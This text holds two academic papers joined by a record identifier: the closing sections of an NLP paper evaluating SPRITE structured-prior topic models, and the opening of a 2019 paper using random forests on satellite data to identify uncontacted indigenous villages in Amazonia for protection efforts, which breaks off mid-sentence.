-512.7 ± 1.6 Hierarchy only †1561.8 ± 1.4 0.620 ± 0.002 -342.6 ± 1.1 †1457.2 ± 6.9 †0.804 ± 0.007 -509.1 ± 1.9 Perspective only †1567.3 ± 2.3 †0.613 ± 0.002 -342.1 ± 1.2 †1413.7 ± 2.2 †0.800 ± 0.002 -512.0 ± 1.7 SCTM-style 1572.5 ± 1.6 0.620 ± 0.002 †-335.8 ± 1.1 1504.0 ± 1.9 †0.837 ± 0.002 †-490.8 ± 0.9 PAM-style †1567.4 ± 1.9 0.620 ± 0.002 -347.6 ± 1.4 †1440.4 ± 2.7 †0.835 ± 0.004 -542.9 ± 6.7 FLDA-style †1559.5 ± 2.0 0.617 ± 0.002 -340.8 ± 1.4 †1451.1 ± 5.4 †0.809 ± 0.006 -505.3 ± 2.3 DMR 1578.0 ± 1.1 0.618 ± 0.002 -343.1 ± 1.0 †1416.4 ± 3.0 †0.799 ± 0.003 -511.6 ± 2.0 PAM 1578.9 ± 0.3 0.622 ± 0.003 †-336.0 ± 1.1 1514.8 ± 0.9 †0.835 ± 0.003 †-493.3 ± 1.2 FLDA 1574.1 ± 2.2 0.618 ± 0.002 -344.4 ± 1.3 1541.9 ± 2.3 0.856 ± 0.003 -502.2 ± 3.1 LDA (learned) 1579.6 ± 1.5 0.620 ± 0.001 -342.6 ± 0.6 1507.9 ± 2.4 0.846 ± 0.002 -501.4 ± 1.2 LDA (fixed) 1659.3 ± 0.9 0.622 ± 0.002 -349.5 ± 0.8 1517.2 ± 0.4 0.920 ± 0.003 -585.2 ± 0.9 Bag of words 2521.6 ± 0.0 0.617 ± 0.000 †-196.2 ± 0.0 1633.5 ± 0.0 0.813 ± 0.000 †-408.1 ± 0.0 Naive baseline 7426.0 ± 0.0 0.677 ± 0.000 -852.9 ± 7.4 10158.0 ± 0.0 1.595 ± 0.000 -795.2 ± 13.0 Table 2: Perplexity of held-out tokens and mean absolute error for attribute prediction using various models (± std. error). † indicates significant improvement (p < 0.05) over optimized LDA under a two-sided t-test. the prediction error using bag of words features, and we measure coherence of the unigram distri- bution; (2) naive baselines, where we measure the perplexity of the uniform distribution over each dataset’s vocabulary, the prediction error when simply predicting each attribute as the mean value in the training set, and the coherence of 20 ran- domly selected words (repeated for 10 trials). Table 2 shows that the full SPRITE model sub- stantially outperforms the LDA baseline at both predictive tasks. Generally, model variants with more structure perform better predictively. The difference between SCTM-style and PAM-style is that the former uses only topic com- ponents (for word distributions) and the latter uses only document components (for the topic distri- butions). Results show that the structured priors are more important for topic than word distribu- tions, since PAM-style has lower perplexity on both datasets. However, models with both topic and document components generally outperform either alone, including comparing the Perspec- tive only and DMR models. The former includes both topic and document perspective components, while DMR has only a document level component. PAM does not significantly outperform opti- mized LDA in most measures, likely because it up- dates the hyperparameters using a moment-based approximation, which is less accurate than our gradient-based optimization. FLDA perplexity is 2.3% higher than optimized LDA on Reviews, comparable to the 4% reported by Paul and Dredze (2012) on a different corpus. The FLDA-style SPRITE variant, which is more flexible, signifi- cantly outperforms FLDA in most measures. The results are quite different under the co- herence metric. It seems that topic components (which influence the word distributions) improve coherence over LDA, while document compo- nents worsen coherence. SCTM-style (which uses only topic components) does the best in both datasets, while PAM-style (which uses only doc- uments) does the worst. PAM also significantly improves over LDA, despite worse perplexity. The LDA (learned) baseline substantially out- performs LDA (fixed) in all cases, highlighting the importance of optimizing hyperparameters, con- sistent with prior research (Wallach et al., 2009a). Surprisingly, many SPRITE variants also outper- form the bag of words regression baseline, even though the latter was tuned to optimize perfor- mance using heavy `2 regularization, which we applied only weakly (without tuning) to the topic model features. We also point out that the “bag of words” version of the coherence metric (the co- herence of the top 20 words) is higher than the av- erage topic coherence, which is an artifact of how the metric is defined: the most probable words in the corpus also tend to co-occur together in most documents, so these words are considered to be highly coherent when grouped together. Parameter Sensitivity We evaluated the full model at the two predictive tasks with varying numbers of topics ({12,25,50,100} for Debates and {5,10,20,40} for Reviews) and components ({2,5,10,20}). Figure 5 shows that performance is more sensitive to the number of topics than com- ponents, with generally less variance among the latter. More topics improve performance mono- tonically on Debates, while performance declines at 40 topics on Reviews. The middle range of com- ponents (5–10) tends to perform better than too few (2) or too many (20) components. Regardless of quantitative differences, the 2 5 10 201500 1600 1700 1800 1900 P er pl ex ity Debates K=12 K=25 K=50 K=100 2 5 10 201400 1450 1500 1550 1600 Reviews K=5 K=10 K=20 K=40 2 5 10 20 Number of components .605 .610 .615 .620 .625 .630 P re di ct io n er ro r 2 5 10 20 Number of components .76 .80 .84 .88 .92 Figure 5: Predictive performance of full model with differ- ent numbers of topics K across different numbers of compo- nents, represented on the x-axis (log scale). τt Debates Reviews 0.000 (Sparse DAG) 58.1% 42.4% 1.000 (Soft Tree) 93.2% 74.6% 1.001t (Hard Tree) 99.8% 99.4% 1.003t (Hard Tree) 100% 100% Table 3: The percentage of indicator values that are sparse (near 0 or 1) when using different annealing schedules. choice of parameters may depend on the end ap- plication and the particular structures that the user has in mind, if interpretability is important. For example, if the topic model is used as a visual- ization tool, then 2 components would not likely result in an interesting hierarchy to the user, even if this setting produces low perplexity. Structured Sparsity We use a relaxation of the binary b that induces a “soft” tree structure. Ta- ble 3 shows the percentage of b values which are within � = .001 of 0 or 1 under various anneal- ing schedules, increasing the inverse temperature τ by 0.1% after each iteration (i.e. τt = 1.001t) as well as 0.3% and no annealing at all (τ = 1). At τ = 0, we model a DAG rather than a tree, be- cause the model has no preference that b is sparse. Many of the values are binary in the DAG case, but the sparse prior substantially increases the number of binary values, obtaining fully binary structures with sufficient annealing. We compare the DAG and tree structures more in the next subsection. 7.3 Structure Comparison The previous subsection experimented with mod- els that included a variety of structures, but did not provide a comparison of each structure in iso- lation, since most model variants were part of a complex joint model. In this section, we exper- iment with the basic SPRITE model for the three structures described in §3: a DAG, a tree, and a factored forest. For each structure, we also exper- iment with each type of component: document, topic, and both types (combined). For this set of experiments, we included a third dataset that does not contain a perspective value: • Abstracts: A set of 957 abstracts from the ACL anthology (97,168 tokens; 8,246 types). These abstracts have previously been analyzed with FLDA (Paul and Dredze, 2012), so we include it here to see if the factored structure that we explore in this section learns similar patterns. Based on our sparsity experiments in the pre- vious subsection, we set τt = 1.003t to induce hard structures (tree and factored) and τ = 0 to in- duce a DAG. We keep the same parameters as the previous subsection: K=50 and C=10 for Debates and K=20 and C=5 for Reviews. For the factored structures, we use two factors, with one factor hav- ing more components than the other: 3 and 7 com- ponents for Debates, and 2 and 3 components for Reviews (the total number of components across the two factors is therefore the same as for the DAG and tree experiments). The Abstracts exper- iments use the same parameters as with Debates. Since the Abstracts dataset does not have a per- spective value to predict, we do not include predic- tion error as a metric, instead focusing on held-out perplexity and topic coherence (Eq. 2). Table 4 shows the results of these two metrics. Some trends are clear and consistent. Topic components always hurt perplexity, while these components typically improve coherence, as was observed in the previous subsection. It has pre- viously been observed that perplexity and topic quality are not correlated (Chang et al., 2009). These results show that the choice of components depends on the task at hand. Combining the two components tends to produce results somewhere in between, suggesting that using both component types is a reasonable “default” setting. Document components usually improve per- plexity, likely due to the nature of the document completion setup, in which half of each document is held out. The document components capture correlations between topics, so by inferring the components that generated the first half of the doc- ument, the prior is adjusted to give more probabil- ity to topics that are likely to occur in the unseen second half. Another interesting trend is that the Perplexity Coherence DAG Tree Factored DAG Tree Factored Debates Document 1572.0 ± 0.9 1568.7 ± 2.0 1566.8 ± 2.0 -342.9 ± 1.2 -346.0 ± 0.9 -343.2 ± 1.0 Topic 1575.0 ± 1.5 1573.4 ± 1.8 1559.3 ± 1.5 -342.4 ± 0.6 -339.2 ± 1.7 -333.9 ± 0.9 Combined 1566.7 ± 1.7 1559.9 ± 1.9 1552.5 ± 1.9 -342.9 ± 1.3 -342.6 ± 1.2 -340.3 ± 1.0 Reviews Document 1456.9 ± 3.8 1446.4 ± 4.0 1450.4 ± 5.5 -512.2 ± 4.6 -527.9 ± 6.5 -535.4 ± 7.4 Topic 1508.5 ± 1.7 1517.9 ± 2.0 1502.0 ± 1.9 -500.1 ± 1.2 -499.0 ± 0.9 -486.1 ± 1.5 Combined 1464.1 ± 3.3 1455.1 ± 5.6 1448.5 ± 8.5 -504.9 ± 1.4 -527.8 ± 6.1 -535.5 ± 8.2 Abstracts Document 3107.7 ± 7.7 3089.5 ± 9.1 3098.7 ± 10.2 -393.2 ± 0.8 -390.8 ± 0.9 -392.8 ± 1.5 Topic 3241.7 ± 2.1 3455.9 ± 10.2 3507.4 ± 9.7 -389.0 ± 0.8 -388.8 ± 0.7 -332.2 ± 1.1 Combined 3200.8 ± 3.5 3307.2 ± 7.8 3364.9 ± 19.1 -373.1 ± 0.8 -360.6 ± 0.9 -342.3 ± 0.9 Table 4: Quantitative results for different structures (columns) and different components (rows) for two metrics (± std. error) across three datasets. The best (structure, component) pair for each dataset and metric is in bold. factored structure tends to perform well under both metrics, with the lowest perplexity and highest co- herence in a majority of the nine comparisons (i.e. each row). Perhaps the models are capturing a nat- ural factorization present in the data. To understand the factored structure qualita- tively, Figure 6 shows examples of components from each factor along with example topics that draw from all pairs of these components, learned on Abstracts. We find that the factor with the smaller number of components (left of the figure) seems to decompose into components represent- ing the major themes or disciplines found in ACL abstracts, with one component expressing compu- tational approaches (top) and the other expressing linguistic theory (bottom). The third component (not shown) has words associated with speech, in- cluding {spoken, speech, recognition}. The factor shown on the right seems to decom- pose into different research topics: one compo- nent represents semantics (top), another syntax (bottom), with others including morphology (top words including {segmentation, chinese, morphol- ogy}) and information retrieval (top words includ- ing {documents, retrieval, ir}). Many of the topics intuitively follow from the components of these two factors. For example, the two topics expressing vector space models and distributional semantics (top left and right) both draw from the “computational” and “semantics” components, while the topics expressing ontolo- gies and question answering (middle left and right) draw from “linguistics” and “semantics”. The factorization is similar to what had been previously been induced by FLDA. Figure 3 of Paul and Dredze (2012) shows components that look similar to the computational methods and linguistic theory components here, and the factor with the largest number of components also de- composes by research topic. These results show that SPRITE is capable of recovering similar struc- tures as FLDA, a more specialized model. SPRITE is also much more flexible than FLDA. While FLDA strictly models a one-to-one mapping of topics to each pair of components, SPRITE allows multiple topics to belong to the same pair (as in the semantics examples above), and conversely SPRITE does not require that all pairs have an as- sociated topic. This property allows SPRITE to scale to larger numbers of factors than FLDA, be- cause the number of topics is not required to grow with the number of all possible tuples. 8 Related Work Our topic and perspective model is related to su- pervised hierarchical LDA (SHLDA) (Nguyen et al., 2013), which learns a topic hierarchy while also learning regression parameters to associate topics with feature values such as political per- spective. This model does not explicitly incorpo- rate perspective-specific word priors into the top- ics (as in our factorized approach). The regression structure is also different. SHLDA is a “down- stream” model, where the perspective value is a re- sponse variable conditioned on the topics. In con- trast, SPRITE is an “upstream” model, where the topics are conditioned on the perspective value. We argue that the latter is more accurate as a gen- erative story (the emitted words depend on the author’s perspective, not the other way around). Moreover, in our model the perspective influences both the word and topic distributions (through the topic and document components, respectively). Inverse regression topic models (Rabinovich and Blei, 2014) use document feature values (such as political ideology) to alter the parameters of the method! words! word! corpus! learning! performance! approaches! training! proposed! based! “Linguistics”! grammar! parsing! representation! structure! grammars! parse! syntax! representations! semantics! formalism! semantic! knowledge! domain! ontology! systems! words! information! wordnet! question! dialogue! parse! treebank! parser! penn! parsers! trees! dependencies! acoustic! corpus! parsing! training! learning! corpus! large! unsupervised! corpora! method! data! semantic! knowledge! semantics! ontology! relations! lexical! concepts! concept! similarity! words! word! vector! semantic! similar! based! method! words! corpus! word! multiword! paper! based! frequency! expressions! question! questions! answer! answering! answers! qa! systems! type! parsing! parser! parse! treebank! grammar! tree! trees! structure! german! languages! french! english! multilingual! italian! structure! spanish! “Computational”! “Semantics”! “Syntax”! Figure 6: Examples of topics (gray boxes) and components (colored boxes) learned on the Abstracts corpus with 50 topics using a factored structure. The components have been grouped into two factors, one factor with 3 components (left) and one with 7 (right), with two examples shown from each. Each topic prior draws from exactly one component from each factor. topic-specific word distributions. This is an alter- native to the more common approach to regression based topic modeling, where the variables affect the topic distributions rather than the word distri- butions. Our SPRITE-based model does both: the document features adjust the prior over topic dis- tributions (through δ), but by tying together the document and topic components (with β), the doc- ument features also affect the prior over word dis- tributions. To the best of our knowledge, this is the first topic model to condition both topic and word distributions on the same features. The topic aspect model (Paul and Girju, 2010a) is also a two-dimensional factored model that has been used to jointly model topic and perspective (Paul and Girju, 2010b). However, this model does not use structured priors over the parameters, unlike most of the models discussed in §4. An alternative approach to incorporating user preferences and expertise are interactive topic models (Hu et al., 2013), a complimentary ap- proach to SPRITE. 9 Discussion and Conclusion We have presented SPRITE, a family of topic mod- els that utilize structured priors to induce pre- ferred topic structures. Specific instantiations of SPRITE are similar or equivalent to several exist- ing topic models. We demonstrated the utility of SPRITE by constructing a single model with many different characteristics, including a topic hierar- chy, a factorization of topic and perspective, and supervision in the form of document attributes. These structures were incorporated into the pri- ors of both the word and topic distributions, unlike most prior work that considered one or the other. Our experiments explored how each of these var- ious model features affect performance, and our results showed that models with structured priors perform better than baseline LDA models. Our framework has made clear advancements with respect to existing structured topic models. For example, SPRITE is more general and of- fers simpler inference than the shared compo- nents topic model (Gormley et al., 2010), and SPRITE allows for more flexible and scalable fac- tored structures than FLDA, as described in earlier sections. Both of these models were motivated by their ability to learn interesting structures, rather than their performance at any predictive task. Sim- ilarly, our goal in this study was not to provide state of the art results for a particular task, but to demonstrate a framework for learning struc- tures that are richer than previous structured mod- els. Therefore, our experiments focused on un- derstanding how SPRITE compares to commonly used models with similar structures, and how the different variants compare under different metrics. Ultimately, the model design choice depends on the application and the user needs. By unifying such a wide variety of topic models, SPRITE can serve as a common framework for enabling model exploration and bringing application-specific pref- erences and structure into topic models. Acknowledgments We thank Jason Eisner and Hanna Wallach for helpful discussions, and Viet-An Nguyen for pro- viding the Congressional debates data. Michael Paul is supported by a Microsoft Research PhD fellowship. References D. Andrzejewski, X. Zhu, and M. Craven. 2009. In- corporating domain knowledge into topic modeling via Dirichlet forest priors. In ICML. R. Balasubramanyan and W. Cohen. 2013. Regular- ization of latent variable models to obtain sparsity. In SIAM Conference on Data Mining. D. Blei and J. Lafferty. 2007. A correlated topic model of Science. Annals of Applied Statistics, 1(1):17–35. D. Blei, T. Griffiths, M. Jordan, and J. Tenenbaum. 2003a. Hierarchical topic models and the nested Chinese restaurant process. In NIPS. D. Blei, A. Ng, and M. Jordan. 2003b. Latent Dirichlet allocation. JMLR. J. Chang, J. Boyd-Graber, S. Gerrish, C. Wang, and D. Blei. 2009. Reading tea leaves: How humans interpret topic models. In NIPS. J. Duchi, E. Hazan, and Y. Singer. 2011. Adaptive sub- gradient methods for online learning and stochastic optimization. JMLR, 12:2121–2159. J. Eisenstein, A. Ahmed, and E. P. Xing. 2011. Sparse additive generative models of text. In ICML. M.R. Gormley, M. Dredze, B. Van Durme, and J. Eis- ner. 2010. Shared components topic models. In NAACL. T. Griffiths and M. Steyvers. 2004. Finding scientific topics. In Proceedings of the National Academy of Sciences of the United States of America. Y. Hu, J. Boyd-Graber, B. Satinoff, and A. Smith. 2013. Interactive topic modeling. Machine Learn- ing, 95:423–469. J. Kivinen and M.K. Warmuth. 1997. Exponentiated gradient versus gradient descent for linear predic- tors. Information and Computation, 132:1–63. J.B. Lewis and K.T. Poole. 2004. Measuring bias and uncertainty in ideal point estimates via the paramet- ric bootstrap. Political Analysis, 12(2):105–127. W. Li and A. McCallum. 2006. Pachinko alloca- tion: DAG-structured mixture models of topic cor- relations. In International Conference on Machine Learning. D. Mimno and A. McCallum. 2008. Topic mod- els conditioned on arbitrary features with Dirichlet- multinomial regression. In UAI. D. Mimno, W. Li, and A. McCallum. 2007. Mixtures of hierarchical topics with Pachinko allocation. In International Conference on Machine Learning. D. Mimno, H.M. Wallach, E. Talley, M. Leenders, and A. McCallum. 2011. Optimizing semantic coher- ence in topic models. In EMNLP. V. Nguyen, J. Boyd-Graber, and P. Resnik. 2013. Lex- ical and hierarchical topic regression. In Neural In- formation Processing Systems. M.J. Paul and M. Dredze. 2012. Factorial LDA: Sparse multi-dimensional text models. In Neural Informa- tion Processing Systems (NIPS). M.J. Paul and M. Dredze. 2013. Drug extraction from the web: Summarizing drug experiences with multi- dimensional topic models. In NAACL. M. Paul and R. Girju. 2010a. A two-dimensional topic-aspect model for discovering multi-faceted topics. In AAAI. M.J. Paul and R. Girju. 2010b. Summarizing con- trastive viewpoints in opinionated text. In Empirical Methods in Natural Language Processing. M.J. Paul, B.C. Wallace, and M. Dredze. 2013. What affects patient (dis)satisfaction? Analyzing online doctor ratings with a joint topic-sentiment model. In AAAI Workshop on Expanding the Boundaries of Health Informatics Using AI. M. Rabinovich and D. Blei. 2014. The inverse regres- sion topic model. In International Conference on Machine Learning. D. Ramage, D. Hall, R. Nallapati, and C.D. Man- ning. 2009. Labeled LDA: a supervised topic model for credit attribution in multi-labeled corpora. In EMNLP. N.A. Smith and J. Eisner. 2006. Annealing structural bias in multilingual weighted grammar induction. In COLING-ACL. E.M. Talley, D. Newman, D. Mimno, B.W. Herr II, H.M. Wallach, G.A.P.C. Burns, M. Leenders, and A. McCallum. 2011. Database of NIH grants us- ing machine-learned categories and graphical clus- tering. Nature Methods, 8(6):443–444. N. Ueda and R. Nakano. 1998. Deterministic anneal- ing EM algorithm. Neural Networks, 11(2):271– 282. B.C. Wallace, M.J. Paul, U. Sarkar, T.A. Trikalinos, and M. Dredze. 2014. A large-scale quantitative analysis of latent factors and sentiment in online doctor reviews. Journal of the American Medical Informatics Association, 21(6):1098–1103. H.M. Wallach, D. Mimno, and A. McCallum. 2009a. Rethinking LDA: Why priors matter. In NIPS. H.M. Wallach, I. Murray, R. Salakhutdinov, and D. Mimno. 2009b. Evaluation methods for topic models. In ICML. C. Wang and D. Blei. 2009. Decoupling sparsity and smoothness in the discrete hierarchical Dirich- let process. In NIPS. M.D. Zeiler. 2012. ADADELTA: An adaptive learning rate method. CoRR, abs/1212.5701. work_hkzle3wyofchtcheq2mcsv3yiu ---- Submitted 29 October 2018 Accepted 16 December 2018 Published 7 January 2019 Corresponding author Robert S. Walker, walkerro@missouri.edu Academic editor Barbara Pes Additional Information and Declarations can be found on page 8 DOI 10.7717/peerj-cs.170 Copyright 2019 Walker and Hamilton Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Machine learning with remote sensing data to locate uncontacted indigenous villages in Amazonia Robert S. Walker1 and Marcus J. Hamilton2,3 1 Department of Anthropology, University of Missouri, Columbia, MO, USA 2 Department of Anthropology, University of Texas at San Antonio, San Antonio, TX, USA 3 Santa Fe Institute, Santa Fe, NM, USA ABSTRACT Background. The world’s last uncontacted indigenous societies in Amazonia have only intermittent and often hostile interactions with the outside world. Knowledge of their locations is essential for urgent protection efforts, but their extreme isolation, small populations, and semi-nomadic lifestyles make this a challenging task. Methods. Remote sensing technology with Landsat satellite sensors is a non-invasive methodology to track isolated indigenous populations through time. However, the small-scale nature of the deforestation signature left by uncontacted populations clear- ing villages and gardens has similarities to those made by contacted indigenous villages. Both contacted and uncontacted indigenous populations often live in proximity to one another making it difficult to distinguish the two in satellite imagery. Here we use machine learning techniques applied to remote sensing data with a training dataset of 500 contacted and 25 uncontacted villages. Results. Uncontacted villages generally have smaller cleared areas, reside at higher elevations, and are farther from populated places and satellite-detected lights at night. A random forest algorithm with an optimally-tuned detection cutoff has a leave- one-out cross-validated sensitivity and specificity of over 98%. A grid search around known uncontacted villages led us to identify three previously-unknown villages using predictions from the random forest model. Our efforts can improve policies toward isolated populations by providing better near real-time knowledge of their locations and movements in relation to encroaching loggers, settlers, and other external threats to their survival. Subjects Data Mining and Machine Learning, Spatial and Geographic Information Systems Keywords Random forest, Satellite imagery, South America, Indigenous societies INTRODUCTION The ongoing colonization of Amazonia has brought waves of epidemics and violence for centuries with severe consequences for indigenous populations (Bodard, 1974; Hemming, 1978; Hurtado et al., 2001; Hamilton, Walker & Kesler, 2014). Amazingly, despite all the external pressures, remote areas in the upper Amazon watershed still support a number of remnant indigenous societies generally referred to as uncontacted or isolated populations (Vaz, 2011; Castillo, 2004; Ricardo & Ricardo, 2011). Despite these labels, intermittent and often hostile interactions with the outside world are commonplace (Wallace, 2011). Most How to cite this article Walker RS, Hamilton MJ. 2019. Machine learning with remote sensing data to locate uncontacted indigenous vil- lages in Amazonia. PeerJ Comput. Sci. 5:e170 http://doi.org/10.7717/peerj-cs.170 https://peerj.com mailto:walkerro@missouri.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.170 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.170 governmental and non-governmental organizations promote no-contact policies for these isolated indigenous populations with the belief that they are safest if left to themselves (Walker & Hill, 2015). However, encroachment from loggers, miners, settlers, and others is incessant and uncontacted societies represent the world’s most critically endangered cultures (Walker, Kesler & Hill, 2016). There is a need for good information on their locations and movements in hopes of improving their survival prospects moving forward. Our project is part of a longitudinal remote surveillance program to conduct scientific studies of indigenous demography and spatial ecology to facilitate informed decisions by policy makers that will increase protection efforts for isolated indigenous populations (Walker & Hamilton, 2014; Walker, Hamilton & Groth, 2014). Our central goal is to gather as much information on isolated indigenous populations as possible without attempting any direct contact (Kesler & Walker, 2015). We maximize the use of available technologies to gather data remotely with no interference. Satellite imagery offers a safe, low-cost, and noninvasive method for studying population dynamics and spatial ecology of indigenous populations (Walker, Kesler & Hill, 2016). Similarly important is the need to understand spatial resource needs of indigenous societies in a region heavily impacted by deforestation, as well as the potential importance of connections among subpopulations, known to contribute to population viability (Levins, 1969; Hanski, 1999). The irreversible threats from large-scale habitat loss via deforestation and conversion of land to agriculture and pasture paint a bleak future for uncontacted populations (Fagan & Shoobridge, 2005; Salisbury & Fagan, 2013; Walker, Kesler & Hill, 2016). The hope is that better data and methods can contribute improvements to this complex issue. Applied machine learning is a vital tool for conservation work as a means to both collect and analyze more data at faster rates (Murray et al., 2018a). The growing use of machine learning methods to analyze large sets of biological, biophysical, spectral and climatological data has enabled accurate differentiation of the world’s landscapes (Pettorelli et al., 2014). More germane to our work are forest classification projects (Hansen et al., 2013; Murray et al., 2018b). The Global Forest Change dataset was developed by classifying pixels using 15 or more high-resolution global composite images as predictors, each developed from over 500,000 Landsat images (Hansen et al., 2013). The random forest algorithm is known to give excellent classification results and relatively quick processing speed (Du et al., 2015; Pal, 2005; Rodriguez-Galiano et al., 2012). Random forests (Breiman, 2001) are an ensemble supervised learning method that builds multiple decisions trees used here for the classification of village class (uncontacted versus contacted). Random forests operate by constructing a multitude of decision trees. Some of the advantages of random forests are that they are robust to inclusion of features that are irrelevant to classification, and they are invariant to transformations of feature variables (Belgiu & Drăguţ, 2016). For these reasons, the random forest algorithm is popular for remote sensing data given its accuracy, speed, and ability to handle high data dimensionality and multicollinearity. Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 2/11 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.170 MATERIALS & METHODS Data We combined the exact locations (centroids) of 25 uncontacted and 500 contacted indigenous villages (Walker, Kesler & Hill, 2016). More information about our general project along with high-resolution imagery for uncontacted villages is available at https://isolatedtribes.missouri.edu. The locations of uncontacted villages were originally derived from scouring high-resolution imagery using a combination of undergraduate helpers and various maps made by governmental and non-governmental agencies in Colombia, Ecuador, Peru and especially Brazil. Several additional locations have been pieced together from governmental reports and news stories stemming from overflights. Contacted villages are from the Brazilian government website (http://www.funai.gov.br/), and we included all of those that were in western Amazonia (west of 60 degrees longitude, Fig. 1). Hansen and colleagues’ (2013) Global Forest Change (GFC) project provides small-scale deforestation at approximately 30 m resolution from Landsat sensors extending back to the year 2000. GFC version 1.5 goes up through the year 2017. We extracted the amount of detected deforestation in 2×2 km squares surrounding each village’s centroid and took the maximum area cleared in any one particular year from across the 17-year period. We refer to this measure as cleared area as it includes both the village and associated gardens but not those of neighboring villages. In addition, our dataset has other features, including regional population density in the nearest 100 square km (CIESIN, 2005), elevation at 30 m digital resolution from the Space Shuttle Radar Topography Mission (Rabus et al., 2003), and distance to populated places at 10 m resolution (Balk et al., 2006). We also included a local lights-at-night measure at 3 km resolution (Pritchard, 2017, from https://earthobservatory.nasa.gov) using the distance from village centroid to the nearest detected lights. Finally, distance to rivers of all the different Strahler stream orders using the Global Self-consistent, Hierarchical, High-resolution Geography Database (Wessel & Smith, 1996), along with the minimum distance to combined rivers of Strahler stream orders 1, 2, and 3, giving a total of 11 features used to train algorithms. Models Machine learning algorithms were performed with the R package caret. We found that an untuned random forest algorithm had a fairly high combination of sensitivity (true positive rate) and specificity (true negative rate) in the 0.8 to 0.9 range. As mentioned above, random forest algorithm is an ensemble classifier that produces multiple decision trees, using a randomly selected subset of training samples and variables. Other algorithms such as neural networks, extreme gradient boosting tree, and lasso logistic regression were also relatively-high performing but gave slightly lower values on one or the other metric. The target classes in our sample are imbalanced with only 4.8% of villages in the sample being uncontacted. During model training we noticed that varying the detection cutoff (also known as the threshold) that classifies villages into one class or the other had large effects on the results (the default cutoff is 0.5 majority rule). In addition, common loss Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 3/11 https://peerj.com https://isolatedtribes.missouri.edu http://www.funai.gov.br/ https://earthobservatory.nasa.gov http://dx.doi.org/10.7717/peerj-cs.170 −10 0 10 −80 −70 −60 longitude la tit u d e contacted uncontacted Figure 1 Map of study locations. Map of 500 contacted indigenous villages in Brazil and 25 uncontacted indigenous villages in Brazil, Colombia, Ecuador, and Peru that were included in the study. Full-size DOI: 10.7717/peerjcs.170/fig-1 metrics such as the area under the ROC curve or the F1 score tended to give either high specificity or sensitivity with our data, but not both. To address the imbalanced data issue and improve model performance, we used a random forest algorithm that iteratively tuned the cutoff value such as to simultaneously maximize both specificity (true negative rate) and sensitivity (true positive rate). In other words, we instituted cost-sensitive learning into the random forest (Elkan, 2001; Zadrozny, Langford & Abe, 2003; Khoshgoftaar, Golawala & Hulse, 2007). The loss metric we used for training is the distance from a perfect model of sensitivity of 1 and specificity of 1. We used 1,000 trees with 2 variables available for splitting at each tree node. To evaluate models we used a leave-one-out cross-validation (non-nested) looped over a range of cutoffs from 0.01 to 0.99 in increments of 0.01. Raising the cutoff value means a higher level of evidence (i.e., more decision trees out of the total 1,000 trees that comprise the random forest) is Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 4/11 https://peerj.com https://doi.org/10.7717/peerjcs.170/fig-1 http://dx.doi.org/10.7717/peerj-cs.170 0.00 0.25 0.50 0.75 1.00 0.00 0.25 0.50 0.75 1.00 cutoff Sensitivity Specificity Distance Figure 2 Model metrics obtained from training the random forest model across a range of cutoffs from 0.01 to 0.99 in increments of 0.01. To train the random forest model we used leave-one-out cross- validation across a range of cutoffs from 0.01 to 0.99 in increments of 0.01. Raising the cutoff value means a higher level of evidence is needed to assign the positive class (uncontacted), which decreases sensitivity (true positive rate) and increases specificity (true negative rate). Here the optimal cutoff (0.2) gives a per- fect cross-validated sensitivity of 1.0 and a specificity of 0.98. The distance is the distance from a perfect model which is minimized during training. Full-size DOI: 10.7717/peerjcs.170/fig-2 needed to assign the positive class (uncontacted) so it decreases sensitivity and increases specificity. Here a sensitive cutoff of 0.2 yields a minimal distance metric and the desired combination of high sensitivity and specificity metrics (Fig. 2). RESULTS Our random forest algorithm, with an optimally-tuned cutoff of 0.2, yields a sensitivity of 1.0 and a specificity of 0.98 using leave-one-out cross-validation. This means that all uncontacted villages are correctly classified and 98% of the contacted villages are correctly classified. Therefore, our model has a strong ability to automatically distinguish between contacted and uncontacted villages. In order of descending variable importance, uncontacted villages have (1) smaller cleared areas, (2) longer distances from lights, (3) higher elevation, (4) longer distances to populated places, (5) lower regional population density, (6) longer distances from rivers of all Strahler stream orders up to and including 3, and (7) shorter distances to rivers of levels 4 and 5. Figure 3 shows density plot comparisons for the top 4 features in terms of variable importance. Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 5/11 https://peerj.com https://doi.org/10.7717/peerjcs.170/fig-2 http://dx.doi.org/10.7717/peerj-cs.170 contacted uncontacted 0.0 0.1 0.2 0.3 0.4 1 10 100 cleared area (ha) d e n si ty A 0.000 0.005 0.010 0.015 0 50 100 150 200 distance to lights (km) d e n si ty B 0.0 0.5 1.0 1.5 10 100 1000 elevation (m) d e n si ty C 0.000 0.002 0.004 0.006 0 100 200 300 distance to town (km) d e n si ty D Figure 3 Smoothed kernel density plots comparing uncontacted to contacted indigenous villages. The top four distinguishing features in terms of variable importance in the random forest model are uncon- tacted villages have (A) smaller cleared areas, (B) farther distances to satellite-detected lights at night, (C) higher elevation, and (D) farther distances to populated places, on average. A and C are best visualized on log scales. Full-size DOI: 10.7717/peerjcs.170/fig-3 Given the success of our algorithm during cross-validation, we then moved to implement it for predictive purposes. We did a grid search of all 2 × 2 km squares within a 100 km radius of the five clusters of known uncontacted villages (Fig. 1). This approach does produce a high number of false positives created by natural clearings (e.g., landslides, windfalls, etc.). Fortunately, most natural clearings can be eliminated by simply removing all clearings that are less than 0.5 ha. This left us with a sample of 20 clearings. Of these we were able to obtain high resolution imagery for eight of these and three contained newly-identified villages. One of these in Colombia appears to be currently inhabited given that it has a single longhouse structure and shows recently made clearings in Global Land Walker and Hamilton (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.170 6/11 https://peerj.com https://doi.org/10.7717/peerjcs.170/fig-3 http://dx.doi.org/10.7717/peerj-cs.170 Analysis and Discovery (GLAD, Tyukavina et al., 2016). The GLAD alert system processes Landsat imagery as it becomes available to identify tree cover change in near real-time. This is an invaluable system for monitoring both recent activity by uncontacted villages, as well as encroaching deforestation from outsiders. The other two newly-discovered sites are historical villages. One is from the uncontacted Yanomami in northern Brazil inhabited from around year 2000 or earlier and until 2004. The other is from Pano speakers on the border between Peru 